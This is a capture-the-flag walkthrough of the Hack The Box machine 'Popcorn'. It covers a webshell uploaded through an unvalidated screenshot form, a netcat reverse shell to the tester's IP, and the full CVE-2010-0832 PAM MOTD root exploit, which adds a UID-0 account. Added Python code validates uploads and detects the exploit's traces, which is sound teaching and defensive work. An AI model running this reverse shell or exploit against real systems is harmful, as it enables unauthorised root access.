
Hack The Box —— Popcorn

20190904190902.png-water_print

Information gathering

nmap

```bash
nmap -T4 -A -v 10.10.10.6
```

I found that the server had ports 22 and 80 open. Browsing to the HTTP service, I found only the default Apache page.

Directory scanning

Use the dirsearch tool to scan a wave of directories:

```bash
python3 dirsearch -u http://10.10.10.6 -e html
```

This turned up the test.php page and the torrent directory. Scanning the torrent directory showed that the upload directory is accessible and that an index.php page exists there as well.

Feature enumeration

The website is a torrent forum. After registering a user, I discovered the upload page.

20190904191408.png-water_print

20190904191435.png-water_print

Exploitation

At the upload point I tried to upload a webshell, which failed. I guessed that the program checks whether the uploaded file is a valid torrent file, and I did not bypass this filter.

I then uploaded a normal torrent file and continued testing:

20190904191857.png-water_print

I found that the page for the uploaded torrent has a screenshot image upload point.

I tried uploading the webshell there and found that it was uploaded successfully.

20190904192051.png-water_print

20190904192134.png-water_print

Visit the upload directory and get the address of the webshell:

20190904192256.png-water_print

Connect with the Chopper (菜刀) webshell client:

20190904192316.png-water_print

Successfully obtained the user's flag.

20190904192325.png-water_print

In the home directory there is also a .cache folder; inside it is the motd.legal-displayed file.

20190904192449.png-water_print

Searching for related material turns up:

https://www.exploit-db.com/exploits/14339

Use the virtual terminal to send a reverse shell back to my own machine, which makes the privilege escalation easier.

Local machine: nc -l 4444

Target machine: nc -e /bin/bash 10.10.14.10 4444

Upload the exploit script using Chopper:


```bash
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# pam_motd follows a symlink at ~/.cache and chowns the link target to the
# user who logs in. The script points ~/.cache at /etc/passwd and /etc/shadow,
# logs in over ssh to trigger that chown, then appends a UID-0 'toor' account.

P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:999999:7:'

echo "[*] Ubuntu PAM MOTD local root"

# A local ssh login is what triggers pam_motd, so ssh, ssh-keygen and a running sshd are required.
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1

backup() {
  [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
  [ -e "$1" ] || return 0
  mv "$1"{,.bak} || return 1
  echo "[*] Backuped $1"
}

restore() {
  [ -e "$1" ] && rm -rf "$1"
  [ -e "$1".bak ] || return 0
  mv "$1"{.bak,} || return 1
  echo "[*] Restored $1"
}

# Install a temporary key so the login to localhost needs no password.
key_create() {
  backup ~/.ssh/authorized_keys
  ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
  [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
  mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
  echo "[*] SSH key set up"
}

key_remove() {
  rm -f "$KEY"
  restore ~/.ssh/authorized_keys
  echo "[*] SSH key removed"
}

# Point ~/.cache at the target file and log in once; pam_motd then chowns the target to us.
own() {
  [ -e ~/.cache ] && rm -rf ~/.cache
  ln -s "$1" ~/.cache || return 1
  echo "[*] spawn ssh"
  ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
  [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
  echo "[+] owned: $1"
}

bye() {
  key_remove
  exit 1
}

KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
# Switch to toor, then remove the account again and restore ownership of the files.
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
  chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
```

And give the script execution permissions:

```bash
chmod +x 1.sh
```

Execute the script and obtain root permissions:

20190904194200.png-water_print

20190904194204.png-water_print
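The web-side root cause is that the torrent upload validated its input while the screenshot upload did not, so a .php file ended up under a directory the web server both serves and executes. The Python module below is an added example of how a defender closes that gap; it is not code from the original post or from the Popcorn site. It applies content checks (a strict bencode parse for torrents, magic bytes for screenshots) at every upload point and stores files under a server-chosen random name with a server-chosen extension, so the client's filename never influences what is written. The sample torrent, PNG header and PHP file are constructed inline.

```python
"""Server-side upload validation for a torrent site (added example).

Both upload points, torrent files and screenshots, go through the same
content checks, and the stored name never derives from the client's
filename or extension."""
import secrets

# Magic bytes of the only image formats a screenshot upload may contain.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024


def bdecode(data: bytes):
    """Strict minimal bencode decoder (ints, byte strings, lists, dicts).

    Anything malformed raises ValueError, so arbitrary text such as PHP
    source can never be accepted as a torrent."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c in (b"l", b"d"):
            items, i = [], i + 1
            while data[i:i + 1] != b"e":
                if i >= len(data):
                    raise ValueError("unterminated container")
                value, i = parse(i)
                items.append(value)
            if c == b"l":
                return items, i + 1
            if len(items) % 2:
                raise ValueError("dict with odd number of elements")
            return dict(zip(items[::2], items[1::2])), i + 1
        if c.isdigit():
            colon = data.index(b":", i)
            length = int(data[i:colon])
            string = data[colon + 1:colon + 1 + length]
            if len(string) != length:
                raise ValueError("truncated string")
            return string, colon + 1 + length
        raise ValueError("unexpected byte at offset %d" % i)

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing bytes after bencoded value")
    return value


def validate_torrent(data: bytes) -> bool:
    """A torrent is a bencoded dict whose 'info' dict describes the content."""
    try:
        meta = bdecode(data)
    except (ValueError, TypeError, RecursionError):
        return False
    if not isinstance(meta, dict):
        return False
    info = meta.get(b"info")
    return isinstance(info, dict) and b"name" in info and b"piece length" in info


def validate_image(data: bytes):
    """Return the image type detected from magic bytes, or None."""
    for ext, magics in IMAGE_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def accept_upload(kind: str, data: bytes):
    """Validate one upload of the given kind ('torrent' or 'screenshot').

    Returns (True, stored_filename) or (False, reason). The client's file
    name is deliberately not a parameter: it is never trusted."""
    if not data or len(data) > MAX_BYTES:
        return False, "bad size"
    if kind == "torrent":
        if not validate_torrent(data):
            return False, "not a valid torrent"
        ext = "torrent"
    elif kind == "screenshot":
        ext = validate_image(data)
        if ext is None:
            return False, "not an image"
    else:
        return False, "unknown upload kind"
    # Random server-chosen name and extension: a request to store
    # shell.php can never yield a file the web server would execute.
    return True, "%s.%s" % (secrets.token_hex(16), ext)


# Constructed sample inputs (not real files from the box).
SAMPLE_TORRENT = (
    b"d8:announce22:http://tracker.example4:infod6:lengthi4e4:name5:a.txt"
    b"12:piece lengthi16384e6:pieces20:" + b"\x00" * 20 + b"ee"
)
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # header only
SAMPLE_PHP = b"<?php /* constructed: neither image nor torrent */ ?>"

if __name__ == "__main__":
    for kind, data in (("torrent", SAMPLE_TORRENT), ("torrent", SAMPLE_PHP),
                       ("screenshot", SAMPLE_PNG), ("screenshot", SAMPLE_PHP)):
        print(kind, accept_upload(kind, data))
```

The point of routing every upload through accept_upload is that a second, less-scrutinised upload form cannot reintroduce the hole; the random name also means a file's URL cannot be guessed from the listing of a browsable upload directory, which is how the webshell address was recovered above. Serving the upload directory with PHP execution disabled (for example an Apache directory block with php_admin_flag engine off) is the complementary control.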
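On the host side, the CVE-2010-0832 escalation used above leaves artifacts a defender can look for: ~/.cache replaced by a symlink to a file outside the user's home directory, /etc/passwd or /etc/shadow owned by a non-root user (pam_motd chowned them and the cleanup may not have run), and a second UID-0 account. The Python checks below are an added example, not part of the original post or of the exploit; the /etc/passwd sample is constructed and the user name alice is hypothetical.

```python
"""Host checks for the artifacts this privilege escalation leaves behind
(added example, not part of the original post or the exploit)."""
import os
import pwd

SYSTEM_FILES = ("/etc/passwd", "/etc/shadow")


def audit_passwd(passwd_text: str) -> list:
    """Return names of accounts that have UID 0 but are not 'root'."""
    extra = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue  # comment, blank or malformed line
        if int(fields[2]) == 0 and fields[0] != "root":
            extra.append(fields[0])
    return extra


def is_escaping_link(home: str, target: str) -> bool:
    """True if a symlink inside `home` with this target resolves outside it."""
    home = os.path.abspath(home)
    resolved = os.path.abspath(os.path.join(home, target))
    return os.path.commonpath([home, resolved]) != home


def check_cache_link(home: str):
    """Return the target of ~/.cache if it is a symlink escaping `home`, else None."""
    cache = os.path.join(home, ".cache")
    if not os.path.islink(cache):
        return None
    target = os.readlink(cache)
    return target if is_escaping_link(home, target) else None


def non_root_owner(path: str):
    """Return (uid, gid) when `path` exists and is not owned by root, else None."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    return None if st.st_uid == 0 else (st.st_uid, st.st_gid)


def scan_live_system() -> list:
    """Run all checks against the running host; returns finding strings."""
    findings = []
    with open("/etc/passwd") as fh:
        for name in audit_passwd(fh.read()):
            findings.append("extra UID-0 account: %s" % name)
    for path in SYSTEM_FILES:
        owner = non_root_owner(path)
        if owner:
            findings.append("%s owned by uid/gid %s" % (path, owner))
    for entry in pwd.getpwall():
        target = check_cache_link(entry.pw_dir)
        if target:
            findings.append("%s/.cache -> %s" % (entry.pw_dir, target))
    return findings


# Constructed sample: a passwd file after the exploit appended 'toor'.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
toor:x:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    print("sample audit:", audit_passwd(SAMPLE_PASSWD))
    for finding in scan_live_system():
        print("[!]", finding)
```

The symlink check only fires during the window in which ~/.cache is redirected, so it belongs in a periodic or inotify-driven job rather than a one-off scan; the ownership and UID-0 checks catch the case where the exploit was interrupted before its cleanup. The real fix is the patched pam_motd from the advisory on the exploit-db page, which stops following the symlink in the first place.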
